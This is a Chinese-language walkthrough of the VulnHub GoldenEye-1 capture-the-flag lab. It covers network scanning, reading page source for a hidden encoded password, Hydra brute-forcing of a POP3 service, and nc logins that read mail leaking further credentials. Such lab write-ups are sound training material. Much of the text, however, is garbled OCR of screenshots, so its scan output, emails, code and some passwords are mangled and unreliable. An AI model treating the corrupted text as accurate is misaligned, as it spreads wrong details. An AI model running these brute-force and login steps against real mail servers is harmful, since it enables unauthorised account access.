靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/
靶机难度:中等(CTF)
目标:得到root权限&找到flag.txt
一、信息收集
1.arp-scan-l 收集目标ip
wehavekept/usr/bin/pythonpointingtopythonfckar
compatibility.Lahoca
https:/www.kati.og/doc/gnr-/yhnat
(Run"touch-/.hushtogintohidethimsge
zsh:corrupthistoryfilehome/xzitr
-(xGLocathost)-[-
sudosu
sudo]x的密码:
(rooteLocathost)-/home/x
#arp-scan-1
Interface:ethotpNMM9
startingarscan1.9.7wth6hostthu
VMware,Inc.
10.10.10.1
00:50:56:c0:00:08
VMware,Inc,
Q0:50:56:ee:6b:0f
10.10.10.2
VMware,Inc,(DUP:2)
10.10.10.1
00:50:56:c0:00:08
10.10.10.254
Q:50:56:f2:98:2C
VMware,Inc,
5packetsreceivedbyfilter,opacketsdroppedbykerel
ndingapstan1.97:.
(rootalocathost)-/home/x
#arp-scan-
Interface:ethotpENoMBM
startingamscan1.9.7wthz56hottth/
10.10.10.1
VMware,Inc.
00:50:56:C0:00:08
VMware,Inc,
00:50:56:ee:6b:0f
10.10.10.2
10.10.10.254
00:50:56:f2:98:2C
ViMware,Inc.
VIMware,Inc.(DUP:2)
10.10.10.1
00:50:56:C0:00:08
6packetsreceivedbyfilterackedpd
Endingarpscan1.9.7:m
rootelocathost-/home/x
arp-scan.1
InterfaceethotpM
startingarpscan1.97wtht/h
10.10.10.1
VMware,Inc.
00:50:56:c0:00:08
00:50:56:ee:6b:of
VMare,Inc.
10.10.10.2
10.10.10.149
00:0c:29:29:77:a6
VMware,Inc,
10.10.10.
00:50:56:c0:00:08
ViMware,Inc.OUP:2
Q0:50:56:f2:98:2c
10.10.10.254
ViMware,Inc,
packetsreceivedbyfiiterackeod
ngarpscan1.97t
Ending
(rootalocathost)./home/x
#
CAPNUM
1会适
138x48
48.5
SSH2
temm
2.使用命令:nmap -sP 192.168.182.0/24
10.10.10.254
00:50:56:f2:98:2c
VMare,Inc.
6packetsreceivedbyfilter,opacketsdroppedbykenel
Endinarscan1.9.7
(cootoLocathosti.homex
#nmap10.10.10.149/24
startingap7.h:/ap
Nmapscanreportfor10.10.10.
Hostisup(0.00028satency.
Notshown:996filteredports
PORTSTATESERVICE
135/tcpopenmsrpc
139/tcpopennetbios-ssn
443/tcpopenhttps
445/tcpopenmicrosoft-ds
MACAddress:00:50:56:C0:00:08(VMware
Nhapscanreportfor10.10.10.2
Hostisup(0.00011statency).
Notshown:999closedports
PORTSTATESERVICE
53/tcpopendomain
MACAddress:00:50:56:EE:6B:0F(VMware)
Nmapscanreportfor10.10.10.149
Hostisup(0.00019statency.
Notshown:998closedports
PORTSTATESERVICE
125/tcpopensmtp
Bo/tcpopenhttp
MIACAdDReSS:OU:OC:29:29:777A67(VMare)
Nmapscanreportfor10.10.10.254
Hostisup(0.0006slatency
Al11000scanedportson10.102i
MACAddress:QQ:50:56:F2:98:2CMware
Nnapscanreport'for10.10.10.128
Hostisup(0.0000060slatency).
Notshown:999closedports
PORTSTATESERVICE
22/tcpopenssh
Napdone:256IPaddesses(Shostsup)scadic
(rootalocalhost)-[/home/x
+
CAPNUM
厂138x48
1会适
48.5
SSH2
xterm
3.使用命令:nmap -sS -sV -T5 -A -p- 192.168.182.141
cootelocalhost.
home
#nmap-sS-sV-T5A
-p-10.10.10149
008:42CST
startingap7ttpsshmap.org
Nmapscanreportfor10.10.10.149
Hostisup(0.o0o99statency.
Notshown:65531closedports
VERSION
STATESERVICE
PORT
Postfixsmtpd
opensmtp
25/tcp
stpcome:mt
ssl-date:fLsrandomnessdoesnotrepresenttine
Apachehttpd2.4.7(Ubuntu))
80/tcp
openhttp
http-server-header:Apache/2.4.7(Ubuntu)
http-title:GotdenEyePrinarydminerver
55006/tcpopenss/unknown
server
sstcert:subject:comonm-cht/gtiom-ecot
Notvalidbefore:2018-04-24T03:23:52
Notvalidafter:2028-04-23T03:23:52
ssl-date:fLsrandomhessdoesnotrepresenttime
55007/tcpopenunknown
MACAddress:00:0C:29:29:77:A6(VMware)
Devicetypegeneralpurpose
linux3.X4.X
Running
/o:linux:linuxkernel:3ce:/:linux:inxkee
OSCPE:
cpe:/o:
3.2:4.9
osdetails:linux3.2
NetworkDistancelhop
TRACEROUTE
ADDRESS
HOPRTT
10.99ms10.10.10.149
Qsandservicedetectiomeiome.Plerotyoth
1IP
addressihostup)scannedin179.09seconds
Nhapdone:
(rootalocathost)-/hone/x
4.到/sev-home/目录中。
GOLdenEyePrimaryAdminServerx
New
景女
10.10.10.149
GreasyFork-安全,...SrcBlog
移动设备上的书签
其他书签
SevernayaAuxiliaryControlstation
*TOPSECRETACCESS*
Identity
Accessingserver
Server
Name
GOLDENEYE
USer:UNKNOWN
ehto1ogir
/sey-home/
Naviagate
to
5.检查主页的html内容以获取任何有用的提示(F12查看)
New
10.10.10.149/
国
/sev-home
山
0
DSrcBlog
移动设备上的书签
其他书签
GreasyFork-安全
10.10,10.149
severnayaAuxiliaryCOntr
此网站要求终登录,
****TOPSECRETACCESS*
***
用户名
Identity
Accessingserver
Seryer
Name
密码
GOLDENEYE
USEK:UNKNOWN
登录
取消
iNaviagatetolsey-home
读取10.10.10.149
无潼碍环境
内存日存储
AdblockPlus>>
样式编辑器
性能
控制台
器应用程序
口查看器D调试器饮网络
HackBar
x
+
过试样式
Q推索HTML
hovd5+崇
元素o
内联
<htol:
KheadEpk/head
<body
aniId-coldenEyerext"
<SPan
ciass--typeing"
spano-</span>
/span
1ass
bicinker
/span
iscriptSrc
K/scripty
ermina1.
</body
/html
html_bodyscnipt
6.发现了一个用户名和密码,然后发现了一个编码加密
New
10.10.10.149/terminaljs
本
舒目大
A
loo
oSrcBlog
移动设备上的书签
GreasyFork-安全...
其他书签
[
data
SECRETACCESS
br/>AccessingServerIdentitykbr/>Server
"spanbr/>se
GoldenEyeText:
SEVERNAyAAuXIIaEYContolSao>O
Name:?.
tologin/span>
to
Br/>GOLDENEYEBYYXABYYSUSEYFUNRNOWNABYS
<SPanNaviadate
sev-home
1:
makesureyouupdateyourderaultpassword.
Boris
TMYsourcessayMI6maybePIaNningtoj
inpiltrate.
IBEONtHELOOKOuTFORANY
suspicLounetworktEaTILC...
encodedyoupesswordbelow..
:9:
I/BTWNATALYASAYESHECANBREAKYOUECODES
varaiElementsdocument.geElementyclassName("typeing
or(varjQ<a11flements.1ength;++)
varcurrentElementIda1iElements.id;
vazcurrentElementiacontent-datatocurcentElementidl:
varelementdocument.getElemenBya(uenemn
VardevlypeTextcurrentElementIdcontent:
variao,isTac,text;
Lunctiontypeof
text-devTypeText.slice(0,++1)
I+(textdevtypeText)return;
elementtext+spancank
varchartext.siice(-1):
i(char-*isTa
true:
iLIcharisTag-ta
taise:
if(isTag)eturntype0:
settimeout(type,60):
O:
GoldenEyePrimaryAdminSe
10.10.10.149/terminaljs
New
10.10.10.149/terminaljs
嚣目
本
王
三
移动设备上的书签
其他书签
GreasyFork-安全..SrcB
OSrcBlog
Vardata
rwyo/ioiygy
GOLDENEyeText:
36:/300批336/6/0cmoo/co
Name
l:
m!
/BorISmakesureyouupdateyourdefaultpassword.
MYsOURCESSaYMI6mayDePlanningoinItrate.
IBeontheLookout
suspiciousnetworktraffic.
outLoranysu
IencodedyoupEsswordbelow...
9:5108:101:72:897:899:107:851:114
7311011810199109108101
I/BTINATAIYASAYSSHECANBREAKYOURCoDES
I
VeailElementsdocument.geElementBylaame'typeing
or(var<a11flements.egth+
warCurYentELementId-a1lElements61.id;
varcurrentElementidcontentdatacojcurrentElementId):
varelement-document.getElementByd(urentElementa
vardEvIYpeTextcurrentElementidcontent;
vari-oislag,texta
(functiontype0
textdevlypeText.slice(0,++i)
1+(CExtMmdevTypeText)return;
ementnHtxt+spanclaslinke2:/an>
varchardtext.siicel-1):
if(char-")istag
true;
isTag-false:
(char
it(isTagreturntype0:
settimeout(type,60):
0:
7,使用burp解密模块解密。
lv2021.2.1-TemporaryProject-licensedtoUncia
A
Help
Window
Burp
Projoct
lntruder
Repeater
Useroptions
Comparer
ShlroScan
Projectoptions
xsSValidator
Proxy
Target
Repeater
Dashboard
Sequencer
lntruder
7381108118810510810589880
Text
Hex
Decodeas
Encodeas.
Hash.
Smartdecode
TextOHex
InvincibleHack3r
Decodeas..
Encodeas-
Hash...
Smartdecode
8.然后登录
Naw
10.10.10.149//sev-home
器
移动设备上的书
其他书签
DSrcBlog
安全
GreasyFork
GOLDENEYE
GoldenEyeisaTopSecretSovietoribtalweal
alweaponsproject.
SinceyouhaveaccessyoudefinitelyholdaTopSecre
clearanceandqualifytobeacertifedGoldeEyeNewk
Operator(GNO)
PleaseemailaqualifidG
edGnOsupervisortoreceivethe
onlineGoldenEyeOperatorsTrainingtobecomean
AdministratoroftheGoldenEyesystem
Remember,sincesecuritybyobscuntyisveryeffective,
wehaveconfiguredourpopsservicetounonaveryhigh
non-defaultport
9.然后使用f12查看,发现了pop3服务。POP3服务器的端口:55006、55007。
10.10.10.149//sev-homel
10.10.10.149/terminalJs
New
器
C
10.10.10.149//sev-home/
5
王
I
ABPOO
S
移动设备上的书签
GreasyFork-安全
其他书签
SrcBlog
GOLDENEYE
GoldenEyeisaTopSecretSovietonbtalweapons
project.SinceyouhaveaccessyoudefinitelyholdaTop
SecretclearanceandqualifytobeacertffdGoldenEye
NetworkOperator(GNO)
PleaseemailaqualifedGNOsupevisoorceiethe
onlineGoldenEyeOperatorsTrainingtobecomean
AdministratoroftheGoldenEyesystem
Remembersincesecuritybyobscurityisveryeffective,
wehaveconiguredourpopsservicetorunonavery
日存储
无渣碍环境
x
样式编提器
0内存
D调试器你网路
中
控制台
器8应用程序
性能
AdblockPlus
HackBar
查看器
+
了过海样式
Q擅索HTML
hovcls
</head?
<body医动
元素口
内
videoLdbvcPosterauyut
uSourcesRmoonrakerhebatype-"ideo/eba
丝承自divagolden
KIvideo
gdivid"golden'溢出
goideno
<hiGo1denEye/hi
font-family:
<P
Agenda-
light,
operator(GNO)
AgEnda
<IP
light,
<PX
ARenda
PleaseemallaqualifiedGnosuperviortorecevetheonline
Arial
Narrow,
bcoldenEyeoperator'sTraining/b
sanS-SEriFR
tobecomeanAdministratoroftheGoldenEyesystem
font-xeight:
<IP>
180;
co1or:
Remenber,since
hite
font-size
1.2re;
isveryeffectivewhaveconfiurdourpopservicetorunonaer
veryhighnon-defaultport
IP
Idiv>
scriptsrco-indexj/script
<I-QallfiedGoLdenEyeNetworkoperatorsupervisos:Ntalyaori
Tb00y>
/htol
htmlbodydivigoldenP
10.浏览器上访问发现是55007端口。
10.10.10.149:55007
GSrcBlog
+OKGOLdENEyEFOPSELecTEONIC-MaIISYSTEm
-ERRUNKNOWECCTTaND
-ERRUNKNOWNCCTMTANd
-ERRUnKnOWEeCFmand.
-ERRUnKNOWNCCRMANd
-ERRUNKNOWECCTaNd.
ERRUNKNONACORLTLAND
ERRUNKNONACORTAND
-ERRUNKNOWECCRMaND
-ERRUNKNOWACCRTANE
+ERRDISCONNECEEDFoRLNECEIVIEY
11.开始生成字典,开始爆破密码。
mootolocaihost.home/x
55007pop3
hydra-Lx.txt.P/us/share/wordlists/fasttrackx
10
secretserviceorganizationsoforlea
Hyny
ors
poses(thisisnon-binding,theeigolsdethic
Hydrhttps:/github.omu
tAOsewalpowteshveiatecapoe
LDATALLXI6tsprlserveroerttl6tak
[DATA]attackingpop3://10.10.1014:50
[STATUS86.0trie/min,t
ISTAUS]66.tis/mini
ERRORPOPSPLANATHSERRDisCoMCdntvtYruthentication
ERORPOPSPLANATHRRDIsComCtdoinCtvtYUrIngauthenticatIon
ERFORPOPSPLANAIHERRDiscomCtedornctvtydrnuthentiction
ERORPOPSPLANAIHEDiComentvtyunhnticto
ERORPOPSPLAINATHRRDiscomctedonctvtydringauthentication
ERRORPOPSPLANAIHSERRDicomtedornctvhito
ERORPOPSPLANAIHERRDisomCdorntvtYdrngauthentication
ERORPOPSPLANATHRRDisomCTdoICtVYrInguthentication
FRRORIPOP3PAINAMHRDiscomedforinactivitydrnaithetication
12.开始使用nc连接,用户:boris 密码:secret1! 用户:natalya 密码:bird
然后开始读邮件
(ootalocathost.hccshareAworqlists
148x2.
#nc10.10.10,14955007
LUKGOLDENEYEPUP3ELecTroNc-MaiLSyste
userboris
1OK
passsecret1!
+OKLogqedin.
list
+0K3messaqes:
1544
2373
3921
retrl
+0K544octets
Return-Path:sroot127.0.0.1.gotdeneye
X-original-To:boris
Delivered-To:boriscoubuntu
Received:fromok(locathost127.0.0.1)
byubuntu(Postfix)withSMTPidD9E47454B1
forsboris:Tue,2Apr199019:22:14-0700(PDT)
Messaqe-Id:20180425022326.D9E47454Blubuntu
Date:Tue,2Apr199019:22:14-0700(PDT)
From:rootal27.0.0.lgodeneye
1中心,mumwddwmalwymmomo
becauseItrustyouandtheotheradminshere.
13.使用,用户:natalya 密码:bird,开始读邮件。
(cootelocathost./usr/sharewordlists
nc10.10.10.14955007
148x4.
+OKGoldenEvePOP3Electronic-Mailsyste
usernatalya
+OR
passbird
+OKLogqed
edin.
list
+0K20
messages:
631
21048
CHHH
ERRUnknown.command:R
reterHH
ERRUnknown.command:RETER
retrl
+OK631octets
Return-Path:rootaubuntu>
x-original-To:natalya
Delivered-To:natalyaaubuntu
Received:fromok(locathost[127.0.0.11)
byubuntu(PostfixwithESMTPidD5EDA454B1
forsnatalyaz:Tue,10Apr199519:45:33-0700(PT)
Message-Id:<20180425024542.DSEDA454BLubuntu
Date:Tue,10Apr199519:45:33-0700(PDT)
From:rootaubuntu
Natalya,pleaseyouneedtostopbrekingboriscodeAY
YouareGNosupervisorfortraining
gnatedtoyou
Also,becautiousofpossiblenetworkb
Kbresche,wehvejntalthtoldenyeibengut
retr
+0K1048octets
Return-Path:srootaubuntu>
X-original-Tonatalya
Delivered-To:natalyaaubuntu
Received:fromroot(locathost[127.0.0.11)
byubuntu(Postfix)withSMTPid17c96454B1
forsnatalyaz:Tue,29Apr199520:19:42-0700(PDT)
Message-Id:201804250319561796454B@ubuntu
Date:Tue,29Ap199520:19:42-0700(PDT)
From:rootaubuntu
感b如]hyymmmy
tsretatedtosecuntyefitsnt
ty...itlgetthechangeorderescatatedwithout
muchhasste
ok,usercredsare:
sername:xenia
password:RcP90rulez
Borisverifiedherasavalidcontractorsojustctthcout?
hudifyoudththavetheunlonoutrintemalDominsevemya-station.com/amcedir
rakesuretoedityourhostfilesinceyuusuallyworkrnoteoffnetwork...
kremoteoff?r
SnceYoureaLinxuserjustpointthisseverstosevemy-ti.ce
14.找到了敏感信息泄露
Message-Id:22018042503195617c96454B@ubuntu
Date:Tue,29Apr199520:19:42-0700(PDT)
From:rootaubuntu
OkNatalynIhaveanewstudentforyou,Asthisisanewsystenplea
,especiaily
letmeorborisknowifyouseeanyconfigisue
Lease1
theguiseof"security...it'uugetthechange(
t'srelatedtosecurity...evenifitsnotusteneritinunder
escalatedwitho
orde
muchhassle:
ok,usercredsare:
username:xenia
password:RoP9orulez!
Borisverifiedherasavalidcontractorsojustcreatetheaccount?
omain:severnaya-station.com/gnocertdi
AndifyoudidhthavetheURonoutinternalomain;
akesuretoedityourhosthlesinceyouusulwooeoeo
Vetc/hosts,
FversIPtosevernaya-station.com
Sinceyou'reaLinuxuserjustpointthisservers
X~C
(rootelocathost)-/usr/share/wordlists]
0
15.进入/etc/hosts目录,加入severnaya-station.com
用户名:xenia
密码:RCP90rulez!
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir
我们现根据邮件提示添加本地域名:severnaya-station.com
16.本地访问。
17.登录之后,发现一个doak用户
18.加入字典
19.开始爆破用户。
hydra -L x.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.149 -s 55007 pop3
19.使用nc连接。
